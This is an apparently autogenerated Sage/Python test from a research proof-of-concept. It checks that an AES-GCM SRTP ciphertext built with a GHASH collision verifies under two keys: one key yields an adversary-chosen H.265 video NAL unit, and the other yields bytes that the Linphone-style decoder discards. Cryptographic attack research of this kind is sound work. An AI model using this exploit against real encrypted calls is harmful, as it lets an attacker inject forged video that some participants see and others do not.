"""End-to-end round-trip test of Step 2.2 × Step 2.1:

Build the per-packet plaintext for a real H.265 NAL using
h265_nal.build_packet_plaintext(), generate an ambiguous SRTP-style
ciphertext under (K_OLD, K_NEW) using test_packet_ambiguous.
build_ambiguous_under_inner_keys() with the embedded adjustment offset,
then check both decryption paths:

  K_OLD branch:
    decrypt_and_verify succeeds → recovered bytes match the laid-out
    plaintext exactly → the very first NAL we feed into the H.265 NAL
    parser is byte-for-byte identical to the original adversary NAL,
    proving the decoder will render the adversary's content.

  K_NEW branch:
    decrypt_and_verify also succeeds (the GHASH collision arranges
    that), but the first 3 bytes are now pseudo-random — so the H.265
    parser either fails to find a start code 0x000001 at offset 0 or
    sees a malformed forbidden_zero_bit / forbidden type. Either way
    the packet is dropped by the depacketizer, matching paper §5.3
    Linphone Single-NAL-Unit valid-vs-discard semantics.

We pick a small-to-medium TRAIL_R NAL (the inter-frame slice payloads,
which dominate the stream and easily fit a 1300-byte MTU) as the
adversary NAL."""


# This file was *autogenerated* from the file attack/crypto/test_nal_roundtrip.sage
from sage.all_cmdline import *   # import sage library

_sage_const_1300 = Integer(1300); _sage_const_0 = Integer(0); _sage_const_1 = Integer(1); _sage_const_32 = Integer(32); _sage_const_33 = Integer(33); _sage_const_34 = Integer(34); _sage_const_39 = Integer(39); _sage_const_64 = Integer(64); _sage_const_8 = Integer(8); _sage_const_16 = Integer(16); _sage_const_0xdeadbeef = Integer(0xdeadbeef); _sage_const_0x00000007 = Integer(0x00000007); _sage_const_0x0042 = Integer(0x0042); _sage_const_2 = Integer(2)
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES

load('attack/crypto/util.sage')
load('attack/crypto/gcm.sage')
load('attack/crypto/srtp_kdf.sage')
load('attack/crypto/h265_nal.sage')
load('attack/crypto/test_packet_ambiguous.sage')


MTU_PAYLOAD = _sage_const_1300   # rough RTP payload upper bound (paper Table 3: Single NAL)


def main():
    path = "src-video/video_01_main_1920x1440.h265"
    with open(path, "rb") as f:
        nals = split_nal_units(f.read())

    # Pick the first NAL that:
    #   - has nal_unit_type in {TRAIL_N, TRAIL_R, VPS_NUT, SPS_NUT, PPS_NUT,
    #     PREFIX_SEI_NUT}, i.e. small non-fragmented payloads,
    #   - fits inside MTU_PAYLOAD once wrapped (NAL + start codes +
    #     FD_NUT trailer ≈ NAL + ~25 bytes).
    pick = None
    for nal in nals:
        nt = nal_type(nal[_sage_const_0 ])
        if nt in (_sage_const_0 , _sage_const_1 , _sage_const_32 , _sage_const_33 , _sage_const_34 , _sage_const_39 ) and len(nal) + _sage_const_64  < MTU_PAYLOAD:
            pick = (nt, nal); break
    if pick is None:
        raise SystemExit("[-] no NAL meets the size constraint")
    nt, adversary_nal = pick

    print(f"[+] adversary NAL: type={nt} ({NAL_TYPE_NAMES.get(nt,'-')}), "
          f"size={len(adversary_nal)} B, head="
          f"{hexlify(adversary_nal[:_sage_const_8 ]).decode()}")

    # Step 2.2: lay out the packet plaintext.
    pt, adj_off = build_packet_plaintext(adversary_nal)
    if len(pt) > MTU_PAYLOAD:
        raise SystemExit(f"[-] plaintext too large ({len(pt)}) for single packet")
    print(f"[+] plaintext: {len(pt)} B, adjustment slot at offset {adj_off} "
          f"(16-byte aligned: {adj_off % _sage_const_16  == _sage_const_0 })")

    # Inputs the attacker would have at runtime in the real PoC.
    k_old = unhexlify("000102030405060708090a0b0c0d0e0f"
                     "101112131415161718191a1b1c1d1e1f")
    k_new = unhexlify("ffeeddccbbaa99887766554433221100"
                     "fedcba9876543210ffeeddccbbaa9988")
    # 12-byte master_salt (as Linphone passes via inner_send_key setter)
    master_salt = unhexlify("aabbccddeeff001122334455")
    ssrc, roc, seq = _sage_const_0xdeadbeef , _sage_const_0x00000007 , _sage_const_0x0042 

    # Step 2.1 (generalised): build the ambiguous ciphertext with the
    # adjustment slot embedded inside the plaintext.
    r = build_ambiguous_under_inner_keys(
        pt, k_old, k_new, master_salt, ssrc, roc, seq,
        adjustment_block_offset=adj_off,
    )
    print(f"[+] ciphertext: {len(r['ciphertext'])} B, tag: "
          f"{hexlify(r['tag16']).decode()}")

    # ----- K_OLD path -----
    cipher_old = AES.new(r["K_enc_old"], AES.MODE_GCM, nonce=r["nonce_old"])
    try:
        pt_old = cipher_old.decrypt_and_verify(r["ciphertext"], r["tag16"])
    except ValueError as e:
        raise SystemExit(f"[-] K_OLD decrypt_and_verify FAILED: {e}")

    # Verify everything outside the adjustment slot matches our laid-out
    # plaintext byte-for-byte.
    pre  = pt_old[:adj_off]
    post = pt_old[adj_off + _sage_const_16 :]
    pre_ref  = pt[:adj_off]
    post_ref = pt[adj_off + _sage_const_16 :]
    if pre != pre_ref or post != post_ref:
        raise SystemExit("[-] K_OLD recovered plaintext deviates from layout "
                         "outside the adjustment slot")
    print(f"[+] K_OLD recovers the plaintext byte-for-byte outside the "
          f"adjustment slot")

    # Now the critical test: feed the recovered plaintext to the NAL parser
    # and confirm the FIRST yielded NAL equals our adversary NAL.
    parsed = split_nal_units(pt_old)
    if not parsed or parsed[_sage_const_0 ] != adversary_nal:
        raise SystemExit("[-] K_OLD parser failed to recover adversary NAL")
    print(f"[+] K_OLD: first NAL parsed back = adversary NAL "
          f"({len(parsed[_sage_const_0 ])} B), bit-for-bit match")
    # Second NAL should be the FD_NUT trailer.
    if len(parsed) >= _sage_const_2  and nal_type(parsed[_sage_const_1 ][_sage_const_0 ]) == FD_NUT_TYPE:
        print(f"[+] K_OLD: second NAL is FD_NUT as expected (decoder will skip)")

    # ----- K_NEW path -----
    cipher_new = AES.new(r["K_enc_new"], AES.MODE_GCM, nonce=r["nonce_new"])
    try:
        pt_new = cipher_new.decrypt_and_verify(r["ciphertext"], r["tag16"])
    except ValueError as e:
        raise SystemExit(f"[-] K_NEW decrypt_and_verify FAILED (tag should "
                         f"still verify): {e}")
    print(f"[+] K_NEW: tag still verifies (ambiguous tag works)")
    # Show the first few bytes — they must differ from the canonical
    # 0x000001 start code + adversary NAL header.
    print(f"      K_OLD prefix: {hexlify(pt_old[:_sage_const_8 ]).decode()}")
    print(f"      K_NEW prefix: {hexlify(pt_new[:_sage_const_8 ]).decode()}")

    # Best-effort decoder simulation: try to parse a NAL out of the K_NEW
    # plaintext. If a 0x000001 happens to appear early by chance the
    # parser may still return *something*; the key check is that the
    # first NAL is NOT the adversary NAL.
    parsed_new = split_nal_units(pt_new)
    if not parsed_new:
        print(f"[+] K_NEW: no NAL parsable from random-looking bytes (best case)")
    else:
        first_new = parsed_new[_sage_const_0 ]
        if first_new == adversary_nal:
            raise SystemExit("[-] K_NEW would decode the adversary NAL too! "
                             "Attack is degenerate.")
        nt_new = nal_type(first_new[_sage_const_0 ])
        print(f"[+] K_NEW: first NAL is type={nt_new} "
              f"({NAL_TYPE_NAMES.get(nt_new, '?')}), {len(first_new)} B, "
              f"differs from adversary NAL → decoder will discard")

    print()
    print("[*] Step 2.3 PASS: K_OLD recovers adversary video NAL, "
          "K_NEW receives a malformed NAL that the decoder discards.")


if __name__ == "__main__":
    main()

